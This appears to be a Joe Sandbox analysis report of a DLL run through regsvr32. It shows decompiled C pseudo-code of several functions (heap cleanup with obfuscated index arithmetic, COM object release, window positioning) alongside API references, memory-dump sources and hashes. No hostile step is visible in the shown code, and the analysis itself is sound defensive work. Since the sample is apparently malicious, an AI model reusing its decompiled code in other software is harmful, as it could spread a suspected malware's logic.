                                                                                                            0x100195db
                                                                                                            0x100195db
                                                                                                            0x100195e0
                                                                                                            0x100195b7
                                                                                                            0x100195bc
                                                                                                            0x100195c4
                                                                                                            0x00000000
                                                                                                            0x100195c6
                                                                                                            0x100195cc
                                                                                                            0x100195d2
                                                                                                            0x100195d9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100195d9
                                                                                                            0x100195c4
                                                                                                            0x100195b5
                                                                                                            0x100195e5
                                                                                                            0x100195f1
                                                                                                            0x1001961a
                                                                                                            0x10019623

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,10042D28,00000010,100139E9,00000000,00000FA0,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010), ref: 100195BC
                                                                                                            • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 100195CC
                                                                                                            Strings
                                                                                                            • kernel32.dll, xrefs: 100195B7
                                                                                                            • InitializeCriticalSectionAndSpinCount, xrefs: 100195C6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                                                                                            • API String ID: 1646373207-3733552308
                                                                                                            • Opcode ID: de7d8ff9db104f549b98b02cbf17b951478f015e0dd05221f36ae1f15d058f40
                                                                                                            • Instruction ID: 1db327cb421c3a6b8c58775e1e461de9fba8f787e71f0b035f5b3f69bb676500
                                                                                                            • Opcode Fuzzy Hash: de7d8ff9db104f549b98b02cbf17b951478f015e0dd05221f36ae1f15d058f40
                                                                                                            • Instruction Fuzzy Hash: 05F05E70600656EFEB02EFA58D98B9D3AF2FB45345B114169F410EE160EB35D6809B28
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10004DD0 Relevance: 6.2, APIs: 4, Instructions: 188memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 64%
                                                                                                            			E10004DD0() {
				void* _t51;
				signed int _t53;
				signed int _t59;
				signed int _t61;
				intOrPtr _t82;
				signed int _t96;
				signed int _t103;
				signed int _t111;
				signed int _t112;
				signed int _t120;
				signed int _t121;
				signed int _t125;
				signed int _t132;
				signed int _t139;
				signed int _t142;
				signed int _t151;
				intOrPtr _t157;
				signed int _t159;
				signed int _t162;
				signed int _t163;
				void* _t164;
				signed int _t166;
				signed int _t173;
				signed int _t177;
				signed int _t189;
				void* _t195;
				void* _t196;

				_t164 =  *(_t195 + 0xc);
				if(_t164 != 0) {
					if( *((intOrPtr*)(_t164 + 0x10)) != 0) {
						_t132 =  *0x1004b0e0; // 0x0
						_t103 =  *0x1004b0dc; // 0x0
						_t151 =  *0x1004b0e8; // 0x0
						_t162 =  *0x1004b0e4; // 0x0
						_t82 =  *((intOrPtr*)(_t164 + 4));
						_t163 =  *0x1004b0ec; // 0x0
						 *((intOrPtr*)( *((intOrPtr*)( *_t164 + 0x28)) + ((_t103 * _t132 * _t151 + _t162 * 2) * _t151 + _t132 * _t132 - _t162 - _t163) * 4 + _t82))(_t82, 0, 0);
					}
					_t111 =  *0x1004b0dc; // 0x0
					_t53 =  *0x1004b0e8; // 0x0
					_t166 =  *0x1004b0ec; // 0x0
					_t10 = _t111 + 1; // 0x1
					_t112 =  *0x1004b0e0; // 0x0
					 *0x1004d3e0(((_t112 - _t166 << 1) - _t10 * _t111 -  *0x1004b0e4 + _t53 *  *0x1004b0d8 << 5) +  *((intOrPtr*)(_t164 + 0x30)));
					_t196 = _t195 + 4;
					if( *((intOrPtr*)(_t164 + 8)) == 0) {
						L9:
						_t157 =  *((intOrPtr*)(_t164 + 4));
						if(_t157 != 0) {
							_t59 =  *0x1004b0dc; // 0x0
							_t120 =  *0x1004b0ec; // 0x0
							_t139 =  *0x1004b0e8; // 0x0
							_t121 =  *0x1004b0e0; // 0x0
							 *((intOrPtr*)(_t164 + 0x20))(_t157, 0, (_t59 * _t120 + 1 + _t139 *  *0x1004b0d8 * 0x3fffffff) * _t120 + (_t139 + 1 + _t121 * 0x3fffffff) *  *0x1004b0e4 + 0x2000 + _t121 * 2 - _t59 << 2,  *((intOrPtr*)(_t164 + 0x34)));
						}
						return HeapFree(GetProcessHeap(), 0, _t164);
					} else {
						_t125 =  *0x1004b0e0; // 0x0
						_t159 =  *0x1004b0ec; // 0x0
						_t173 =  *0x1004b0dc; // 0x0
						_t142 =  *0x1004b0d8; // 0x0
						_t61 =  *0x1004b0e4; // 0x0
						_t12 = _t125 + 1; // 0x1
						 *(_t196 + 0x18) = 0;
						if( *((intOrPtr*)(_t164 + 0xc)) - (_t173 * _t142 + _t12 * _t159 + _t61 << 1) <= 0) {
							L8:
							 *0x1004d3e0((_t61 << 4) - ((_t142 * _t142 << 4) + 0x10) * _t159 +  *((intOrPtr*)(_t164 + 8)));
							_t196 = _t196 + 4;
							goto L9;
						} else {
							goto L5;
						}
						do {
							L5:
							_t96 =  *0x1004b0dc; // 0x0
							_t177 =  *0x1004b0e8; // 0x0
							 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t164 + 8));
							if( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)) + ( *(_t196 + 0x18) + ((_t159 - _t96 - 1) * _t125 + _t177 * _t142) * 2 + (_t159 - _t96 - 1) * _t125 + _t177 * _t142) * 4)) != 0) {
								_t189 =  *0x1004b0e4; // 0x0
								_t25 = _t159 - (_t96 *  *0x1004b0e8 + _t189) * _t125 -  *0x1004b0e8 + _t142 - 2; // -268742890
								 *((intOrPtr*)(_t164 + 0x2c))( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x14)) + ((_t125 - (_t142 * _t142 << 1) + _t125 + 2) *  *0x1004b0e4 +  *((intOrPtr*)(_t196 + 0x1c)) + (_t159 - (_t96 *  *0x1004b0e8 + _t189) * _t125 -  *0x1004b0e8 + _t142 + _t25) * _t96 + (_t159 + 1) * _t125 * 2) * 4)),  *((intOrPtr*)(_t164 + 0x34)));
								_t142 =  *0x1004b0d8; // 0x0
								_t159 =  *0x1004b0ec; // 0x0
								_t125 =  *0x1004b0e0; // 0x0
								_t96 =  *0x1004b0dc; // 0x0
								_t196 = _t196 + 8;
							}
							_t61 =  *0x1004b0e4; // 0x0
							 *(_t196 + 0x18) =  *(_t196 + 0x18) + 1;
							_t37 = _t125 + 1; // 0x1
						} while ( *(_t196 + 0x18) <  *((intOrPtr*)(_t164 + 0xc)) - (_t96 * _t142 + _t37 * _t159 + _t61 << 1));
						goto L8;
					}
				}
				return _t51;
			}






























                                                                                                            0x10004dd2
                                                                                                            0x10004dd8
                                                                                                            0x10004de6
                                                                                                            0x10004de8
                                                                                                            0x10004dee
                                                                                                            0x10004df4
                                                                                                            0x10004dfd
                                                                                                            0x10004e06
                                                                                                            0x10004e1d
                                                                                                            0x10004e2f
                                                                                                            0x10004e2f
                                                                                                            0x10004e31
                                                                                                            0x10004e37
                                                                                                            0x10004e43
                                                                                                            0x10004e4c
                                                                                                            0x10004e52
                                                                                                            0x10004e6c
                                                                                                            0x10004e75
                                                                                                            0x10004e7a
                                                                                                            0x10004fbd
                                                                                                            0x10004fbd
                                                                                                            0x10004fc2
                                                                                                            0x10004fc7
                                                                                                            0x10004fcc
                                                                                                            0x10004fd3
                                                                                                            0x10004ff4
                                                                                                            0x1000501f
                                                                                                            0x10005022
                                                                                                            0x00000000
                                                                                                            0x10004e80
                                                                                                            0x10004e80
                                                                                                            0x10004e86
                                                                                                            0x10004e8c
                                                                                                            0x10004e92
                                                                                                            0x10004e98
                                                                                                            0x10004ea0
                                                                                                            0x10004eb3
                                                                                                            0x10004ebb
                                                                                                            0x10004f9b
                                                                                                            0x10004fb4
                                                                                                            0x10004fba
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10004ec1
                                                                                                            0x10004ec1
                                                                                                            0x10004ec4
                                                                                                            0x10004eca
                                                                                                            0x10004ed0
                                                                                                            0x10004ef3
                                                                                                            0x10004efc
                                                                                                            0x10004f1d
                                                                                                            0x10004f51
                                                                                                            0x10004f54
                                                                                                            0x10004f5a
                                                                                                            0x10004f60
                                                                                                            0x10004f66
                                                                                                            0x10004f6c
                                                                                                            0x10004f6c
                                                                                                            0x10004f76
                                                                                                            0x10004f7c
                                                                                                            0x10004f80
                                                                                                            0x10004f91
                                                                                                            0x00000000
                                                                                                            0x10004ec1
                                                                                                            0x10004e7a
                                                                                                            0x1000503a

                                                                                                            APIs
                                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 10004E6C
                                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 10004FB4
                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,00000000), ref: 10005028
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 1000502F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ??3@Heap$FreeProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 834397476-0
                                                                                                            • Opcode ID: 391aa570712f7e89dbfeb0fca8f603a18ca8548013477e7103293fc6906814a1
                                                                                                            • Instruction ID: 9f87828e50faab3a5d058e3d57900a61c1aef8edd5c1bc6d424dad7412e7468d
                                                                                                            • Opcode Fuzzy Hash: 391aa570712f7e89dbfeb0fca8f603a18ca8548013477e7103293fc6906814a1
                                                                                                            • Instruction Fuzzy Hash: 94719631200B158FE318DF6CCEC5A57B7A9FB89341B05C52ED926CB7A5E670E905CB48
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000E9AF Relevance: 6.2, APIs: 4, Instructions: 186COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 69%
                                                                                                            			E1000E9AF(intOrPtr __ecx, intOrPtr* __edi) {
				void* __ebx;
				void* __esi;
				intOrPtr* _t87;
				intOrPtr* _t88;
				intOrPtr _t89;
				intOrPtr* _t90;
				void* _t91;
				intOrPtr _t104;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr* _t148;
				intOrPtr* _t161;
				intOrPtr _t162;
				intOrPtr _t163;
				void* _t165;
				intOrPtr _t167;
				intOrPtr* _t168;
				void* _t170;
				intOrPtr _t183;

				_t161 = __edi;
				E10011BF0(0x1003af91, _t170);
				_t167 = __ecx;
				 *((intOrPtr*)(_t170 - 0x1c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x1004060c;
				 *(_t170 - 4) = 0;
				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
					_t121 =  *((intOrPtr*)(__ecx + 0x50));
					if(_t121 != 0) {
						_t122 =  *_t121;
						_push(_t170 - 0x14);
						_push(0x10043208);
						_push(_t122);
						if( *((intOrPtr*)( *_t122))() >= 0) {
							_t124 =  *((intOrPtr*)(_t170 - 0x14));
							_push(_t170 - 0x10);
							_push(0x10043348);
							 *((intOrPtr*)(_t170 - 0x10)) = 0;
							_push(_t124);
							if( *((intOrPtr*)( *_t124 + 0x10))() >= 0) {
								_t128 =  *((intOrPtr*)(_t170 - 0x10));
								 *((intOrPtr*)( *_t128 + 0x18))(_t128,  *((intOrPtr*)(__ecx + 0x58)));
								_t130 =  *((intOrPtr*)(_t170 - 0x10));
								 *((intOrPtr*)( *_t130 + 8))(_t130);
							}
							_t126 =  *((intOrPtr*)(_t170 - 0x14));
							 *((intOrPtr*)( *_t126 + 8))(_t126);
						}
					}
				}
				_push(_t161);
				L8:
				if( *((intOrPtr*)(_t167 + 0x24)) != 0) {
					_t161 =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x1c)) + 8));
					 *((intOrPtr*)( *((intOrPtr*)( *_t161)) + 0xbc))( *((intOrPtr*)(_t161 + 8)), 0);
					 *((intOrPtr*)( *_t161 + 0x94)) = 0;
					goto L8;
				}
				 *((intOrPtr*)(_t170 - 0x18)) = _t167 + 0x18;
				E1001E047(_t167 + 0x18);
				if( *((intOrPtr*)(_t167 + 0x40)) == 0) {
					L16:
					_t87 =  *((intOrPtr*)(_t167 + 8));
					if(_t87 != 0) {
						 *((intOrPtr*)( *_t87 + 8))(_t87);
					}
					_t88 =  *((intOrPtr*)(_t167 + 0xc));
					if(_t88 != 0) {
						 *((intOrPtr*)( *_t88 + 8))(_t88);
					}
					if( *((intOrPtr*)(_t167 + 0x14)) == 0) {
						L29:
						_t89 =  *((intOrPtr*)(_t167 + 0x34));
						if(_t89 != 0) {
							__imp__CoTaskMemFree(_t89);
						}
						_t138 =  *((intOrPtr*)(_t167 + 0x54));
						if( *((intOrPtr*)(_t167 + 0x54)) != 0) {
							E1000DA8C(_t138, _t161,  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x50)))));
							E10009EC5( *((intOrPtr*)(_t167 + 0x54)));
						}
						_t162 =  *((intOrPtr*)(_t167 + 0x54));
						_t195 = _t162;
						if(_t162 != 0) {
							E10009EC5(_t162);
							_push(_t162);
							L1001F7A9(0, _t162, _t167, _t195);
						}
						_t163 =  *((intOrPtr*)(_t167 + 0x50));
						_t196 = _t163;
						if(_t163 != 0) {
							E1000E731(_t163, _t196);
							_push(_t163);
							L1001F7A9(0, _t163, _t167, _t196);
						}
						_t90 =  *((intOrPtr*)(_t167 + 0x4c));
						if(_t90 != 0) {
							 *((intOrPtr*)( *_t90 + 8))(_t90);
						}
						_t168 =  *((intOrPtr*)(_t167 + 0x48));
						if(_t168 != 0) {
							 *((intOrPtr*)( *_t168 + 8))(_t168);
						}
						 *(_t170 - 4) =  *(_t170 - 4) | 0xffffffff;
						_t91 = E1001E10D( *((intOrPtr*)(_t170 - 0x18)));
						 *[fs:0x0] =  *((intOrPtr*)(_t170 - 0xc));
						return _t91;
					} else {
						 *((intOrPtr*)(_t170 - 0x10)) = 0;
						if( *((intOrPtr*)(_t167 + 0x10)) <= 0) {
							L28:
							__imp__CoTaskMemFree( *((intOrPtr*)(_t167 + 0x14)));
							goto L29;
						}
						_t165 = 0;
						do {
							_t104 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x14)) + _t165 + 0x24)) + 4));
							 *((intOrPtr*)(_t170 - 0x14)) = _t104;
							if(_t104 == 0) {
								goto L25;
							} else {
								goto L24;
							}
							do {
								L24:
								 *((intOrPtr*)( *((intOrPtr*)(E10006D96(_t170 - 0x14))) + 0x94)) = 0;
							} while ( *((intOrPtr*)(_t170 - 0x14)) != 0);
							L25:
							E1001E047( *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x14)) + _t165 + 0x24)));
							_t148 =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x14)) + _t165 + 0x24));
							if(_t148 != 0) {
								 *((intOrPtr*)( *_t148 + 4))(1);
							}
							 *((intOrPtr*)(_t170 - 0x10)) =  *((intOrPtr*)(_t170 - 0x10)) + 1;
							_t165 = _t165 + 0x28;
						} while ( *((intOrPtr*)(_t170 - 0x10)) <  *((intOrPtr*)(_t167 + 0x10)));
						goto L28;
					}
				}
				_t161 = 0;
				if( *((intOrPtr*)(_t167 + 0x38)) <= 0) {
					L14:
					if(_t183 != 0) {
						_push( *((intOrPtr*)(_t167 + 0x3c)));
						L1001F7A9(0, _t161, _t167, _t183);
						_push( *((intOrPtr*)(_t167 + 0x40)));
						L1001F7A9(0, _t161, _t167, _t183);
					}
					goto L16;
				}
				 *((intOrPtr*)(_t170 - 0x10)) = 0;
				do {
					__imp__#9( *((intOrPtr*)(_t167 + 0x40)) +  *((intOrPtr*)(_t170 - 0x10)));
					 *((intOrPtr*)(_t170 - 0x10)) =  *((intOrPtr*)(_t170 - 0x10)) + 0x10;
					_t161 = _t161 + 1;
				} while (_t161 <  *((intOrPtr*)(_t167 + 0x38)));
				_t183 =  *((intOrPtr*)(_t167 + 0x38));
				goto L14;
			}


























                                                                                                            0x1000e9af
                                                                                                            0x1000e9b4
                                                                                                            0x1000e9be
                                                                                                            0x1000e9c0
                                                                                                            0x1000e9c3
                                                                                                            0x1000e9ce
                                                                                                            0x1000e9d1
                                                                                                            0x1000e9d3
                                                                                                            0x1000e9d8
                                                                                                            0x1000e9da
                                                                                                            0x1000e9e1
                                                                                                            0x1000e9e2
                                                                                                            0x1000e9e7
                                                                                                            0x1000e9ec
                                                                                                            0x1000e9ee
                                                                                                            0x1000e9f4
                                                                                                            0x1000e9f5
                                                                                                            0x1000e9fa
                                                                                                            0x1000e9ff
                                                                                                            0x1000ea05
                                                                                                            0x1000ea07
                                                                                                            0x1000ea10
                                                                                                            0x1000ea13
                                                                                                            0x1000ea19
                                                                                                            0x1000ea19
                                                                                                            0x1000ea1c
                                                                                                            0x1000ea22
                                                                                                            0x1000ea22
                                                                                                            0x1000e9ec
                                                                                                            0x1000e9d8
                                                                                                            0x1000ea25
                                                                                                            0x1000ea44
                                                                                                            0x1000ea47
                                                                                                            0x1000ea2b
                                                                                                            0x1000ea36
                                                                                                            0x1000ea3e
                                                                                                            0x00000000
                                                                                                            0x1000ea3e
                                                                                                            0x1000ea4c
                                                                                                            0x1000ea4f
                                                                                                            0x1000ea57
                                                                                                            0x1000ea91
                                                                                                            0x1000ea91
                                                                                                            0x1000ea96
                                                                                                            0x1000ea9b
                                                                                                            0x1000ea9b
                                                                                                            0x1000ea9e
                                                                                                            0x1000eaa3
                                                                                                            0x1000eaa8
                                                                                                            0x1000eaa8
                                                                                                            0x1000eaae
                                                                                                            0x1000eb1d
                                                                                                            0x1000eb1d
                                                                                                            0x1000eb22
                                                                                                            0x1000eb25
                                                                                                            0x1000eb25
                                                                                                            0x1000eb2b
                                                                                                            0x1000eb30
                                                                                                            0x1000eb37
                                                                                                            0x1000eb3f
                                                                                                            0x1000eb3f
                                                                                                            0x1000eb44
                                                                                                            0x1000eb47
                                                                                                            0x1000eb49
                                                                                                            0x1000eb4d
                                                                                                            0x1000eb52
                                                                                                            0x1000eb53
                                                                                                            0x1000eb58
                                                                                                            0x1000eb59
                                                                                                            0x1000eb5c
                                                                                                            0x1000eb5e
                                                                                                            0x1000eb62
                                                                                                            0x1000eb67
                                                                                                            0x1000eb68
                                                                                                            0x1000eb6d
                                                                                                            0x1000eb6e
                                                                                                            0x1000eb74
                                                                                                            0x1000eb79
                                                                                                            0x1000eb79
                                                                                                            0x1000eb7c
                                                                                                            0x1000eb81
                                                                                                            0x1000eb86
                                                                                                            0x1000eb86
                                                                                                            0x1000eb8c
                                                                                                            0x1000eb90
                                                                                                            0x1000eb9a
                                                                                                            0x1000eba2
                                                                                                            0x1000eab0
                                                                                                            0x1000eab3
                                                                                                            0x1000eab6
                                                                                                            0x1000eb14
                                                                                                            0x1000eb17
                                                                                                            0x00000000
                                                                                                            0x1000eb17
                                                                                                            0x1000eab8
                                                                                                            0x1000eaba
                                                                                                            0x1000eac1
                                                                                                            0x1000eac6
                                                                                                            0x1000eac9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000eacb
                                                                                                            0x1000eacb
                                                                                                            0x1000eae0
                                                                                                            0x1000eae0
                                                                                                            0x1000eae8
                                                                                                            0x1000eaef
                                                                                                            0x1000eaf7
                                                                                                            0x1000eafd
                                                                                                            0x1000eb03
                                                                                                            0x1000eb03
                                                                                                            0x1000eb06
                                                                                                            0x1000eb0c
                                                                                                            0x1000eb0f
                                                                                                            0x00000000
                                                                                                            0x1000eaba
                                                                                                            0x1000eaae
                                                                                                            0x1000ea59
                                                                                                            0x1000ea5e
                                                                                                            0x1000ea7d
                                                                                                            0x1000ea7d
                                                                                                            0x1000ea7f
                                                                                                            0x1000ea82
                                                                                                            0x1000ea87
                                                                                                            0x1000ea8a
                                                                                                            0x1000ea90
                                                                                                            0x00000000
                                                                                                            0x1000ea7d
                                                                                                            0x1000ea60
                                                                                                            0x1000ea63
                                                                                                            0x1000ea6a
                                                                                                            0x1000ea70
                                                                                                            0x1000ea74
                                                                                                            0x1000ea75
                                                                                                            0x1000ea7a
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeTask$ClearH_prologVariant
                                                                                                            • String ID:
                                                                                                            • API String ID: 82050969-0
                                                                                                            • Opcode ID: 49f28926b3a515cc494aedc195bb947ea9c7f92216f3cce8caedecae21e31748
                                                                                                            • Instruction ID: 43d2ea8d123215d3b84d8545f0b19a771d1917bb58f1b2237b0c9da6e0f617ce
                                                                                                            • Opcode Fuzzy Hash: 49f28926b3a515cc494aedc195bb947ea9c7f92216f3cce8caedecae21e31748
                                                                                                            • Instruction Fuzzy Hash: 3E712675A00682DFDB24CFA4C9C486AB7F5FF49380715486DE156AB665CB30FC81CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000E58F Relevance: 6.2, APIs: 4, Instructions: 165windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 63%
                                                                                                            			E1000E58F(void* __ecx, void* __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t58;
				intOrPtr _t60;
				intOrPtr* _t62;
				intOrPtr* _t65;
				intOrPtr _t66;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t84;
				void* _t107;
				void* _t126;
				intOrPtr _t130;
				intOrPtr* _t131;
				intOrPtr* _t133;
				intOrPtr* _t134;
				void* _t135;
				intOrPtr _t136;
				void* _t137;

				_t126 = __edx;
				_t135 = __ecx;
				_t130 = E10023092( *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)) + 0x24)));
				_v12 = _t130;
				_t58 = IsWindowVisible( *(_t130 + 0x1c));
				asm("sbb eax, eax");
				_t60 =  ~_t58 + 1;
				_v24 = _t60;
				_t107 = 0;
				if(_t60 != 0) {
					GetWindowRect( *(E100220EE(_t137, GetDesktopWindow()) + 0x1c),  &_v56);
					GetWindowRect( *(_t130 + 0x1c),  &_v40);
					asm("cdq");
					asm("cdq");
					E1002036F(_t130, _v56.right - _v56.left - _t126 >> 1, _v56.bottom - _v56.top - _t126 >> 1, _t107, _t107, _t107);
					E100203AD(_t130, 1);
				}
				_t62 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 4)) + 0x4c));
				_t131 = _t135 + 0x48;
				_push(_t131);
				_push(0x100405f8);
				_push(_t62);
				if( *((intOrPtr*)( *_t62))() < 0) {
					_t65 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 4)) + 0x4c));
					_t66 =  *((intOrPtr*)( *_t65))(_t65, 0x10040550,  &_v16);
					if(_t66 >= _t107) {
						_t67 = _v16;
						 *((intOrPtr*)( *_t67 + 0x14))(_t67,  &_v20);
						_t69 = _v16;
						 *((intOrPtr*)( *_t69 + 8))(_t69);
						_t71 = _v20;
						if(_t71 != _t107) {
							_t133 = _t135 + 8;
							_v8 =  *((intOrPtr*)( *_t71))(_t71, 0x10042ff8, _t133);
							_t73 = _v20;
							 *((intOrPtr*)( *_t73 + 8))(_t73);
							_t66 = _v8;
							if(_t66 >= _t107) {
								_t134 =  *_t133;
								 *((intOrPtr*)( *_t134))(_t134, 0x10042fe8, _t135 + 0xc);
								goto L14;
							}
						} else {
							_t66 = 0x80004005;
						}
					}
				} else {
					_t84 =  *_t131;
					_t134 = _t135 + 0x4c;
					_v8 =  *((intOrPtr*)( *_t84 + 0xc))(_t84, _t107, 0x10043298, _t134);
					if( *_t134 == _t107) {
						_v8 = 0x80004003;
					}
					if(_v8 >= _t107) {
						L14:
						_t136 = E1000E14F(_t107, _t135, _t134, _t135);
						if(_v24 != _t107) {
							E1002036F(_v12, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, _t107);
							E100203AD(_v12, _t107);
						}
						_t66 = _t136;
					} else {
						if(_v24 != _t107) {
							E1002036F(_v12, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, _t107);
							E100203AD(_v12, _t107);
						}
						_t66 = _v8;
					}
				}
				return _t66;
			}

































                                                                                                            0x1000e58f
                                                                                                            0x1000e597
                                                                                                            0x1000e5a5
                                                                                                            0x1000e5aa
                                                                                                            0x1000e5ad
                                                                                                            0x1000e5b5
                                                                                                            0x1000e5b7
                                                                                                            0x1000e5ba
                                                                                                            0x1000e5bd
                                                                                                            0x1000e5be
                                                                                                            0x1000e5d3
                                                                                                            0x1000e5e0
                                                                                                            0x1000e5ed
                                                                                                            0x1000e5fd
                                                                                                            0x1000e603
                                                                                                            0x1000e60c
                                                                                                            0x1000e60c
                                                                                                            0x1000e614
                                                                                                            0x1000e619
                                                                                                            0x1000e61c
                                                                                                            0x1000e61d
                                                                                                            0x1000e622
                                                                                                            0x1000e627
                                                                                                            0x1000e688
                                                                                                            0x1000e697
                                                                                                            0x1000e69b
                                                                                                            0x1000e6a1
                                                                                                            0x1000e6ab
                                                                                                            0x1000e6ae
                                                                                                            0x1000e6b4
                                                                                                            0x1000e6b7
                                                                                                            0x1000e6bc
                                                                                                            0x1000e6c7
                                                                                                            0x1000e6d3
                                                                                                            0x1000e6d6
                                                                                                            0x1000e6dc
                                                                                                            0x1000e6df
                                                                                                            0x1000e6e4
                                                                                                            0x1000e6e6
                                                                                                            0x1000e6f4
                                                                                                            0x00000000
                                                                                                            0x1000e6f4
                                                                                                            0x1000e6be
                                                                                                            0x1000e6be
                                                                                                            0x1000e6be
                                                                                                            0x1000e6bc
                                                                                                            0x1000e629
                                                                                                            0x1000e629
                                                                                                            0x1000e62d
                                                                                                            0x1000e63d
                                                                                                            0x1000e640
                                                                                                            0x1000e642
                                                                                                            0x1000e642
                                                                                                            0x1000e64c
                                                                                                            0x1000e6f6
                                                                                                            0x1000e700
                                                                                                            0x1000e702
                                                                                                            0x1000e71c
                                                                                                            0x1000e725
                                                                                                            0x1000e725
                                                                                                            0x1000e72a
                                                                                                            0x1000e652
                                                                                                            0x1000e655
                                                                                                            0x1000e66f
                                                                                                            0x1000e678
                                                                                                            0x1000e678
                                                                                                            0x1000e67d
                                                                                                            0x1000e67d
                                                                                                            0x1000e64c
                                                                                                            0x1000e730

                                                                                                            APIs
                                                                                                            • IsWindowVisible.USER32(?), ref: 1000E5AD
                                                                                                            • GetDesktopWindow.USER32 ref: 1000E5C0
                                                                                                            • GetWindowRect.USER32 ref: 1000E5D3
                                                                                                            • GetWindowRect.USER32 ref: 1000E5E0
                                                                                                              • Part of subcall function 1002036F: MoveWindow.USER32(?,?,?,00000000,?,00000000,?,1000E721,?,?), ref: 1002038A
                                                                                                              • Part of subcall function 100203AD: ShowWindow.USER32(?,?,1000E72A,00000000,?,?), ref: 100203BA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
